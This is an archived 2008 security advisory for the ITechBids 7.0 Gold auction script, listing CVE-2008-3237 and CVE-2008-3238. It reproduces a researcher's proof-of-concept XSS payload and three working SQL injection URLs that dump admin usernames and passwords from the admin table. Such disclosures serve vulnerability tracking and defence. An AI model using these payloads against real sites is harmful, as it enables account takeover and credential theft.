Topic : | ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
|
SecurityAlert : 4015
CVE : CVE-2008-3237 CVE : CVE-2008-3238 CWE : CWE-79
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : No
Credit : Encrypt3d.M!nd
Published : 21.07.2008
Affected Software : | ITechScripts, ITechBids, 7.0, Gold |
 Advisory Content :
# !R4Q!4N H4CK3R #
ITechBids 7.0 Gold Multiple Remote Vulnerabilities
Website : http://www.itechscripts.com
Founded By : Encrypt3d.M!nd
NOTE:I Didn't Search The Script Well,So Maybe There is other
Vulnerabilities.
# 1- Cross-site scripting (XSS):
Affected File : forward_to_friend.php
PoC :
/forward_to_friend.php?productid=<script>alert(666);</script>
# 2-Remote Sql Injection(s) :
Affected File(s) :
sellers_othersitem.php
classifieds.php
shop.php
Note:There is Other Files Affected But I Couldn't Exploit Them :(
PoC:
/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_nam
e,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin
/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,
password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39+from+admin
/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
33,34,35,36,37,38,39+from+admin
# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
KoRn The Dog,Mini-Spider,All My Friends
The EnD :D
References :
http://securityreason.com/expldownload/1/4325/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/43758
http://www.securityfocus.com/bid/30215
http://www.milw0rm.com/exploits/6069
http://secunia.com/advisories/31084
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|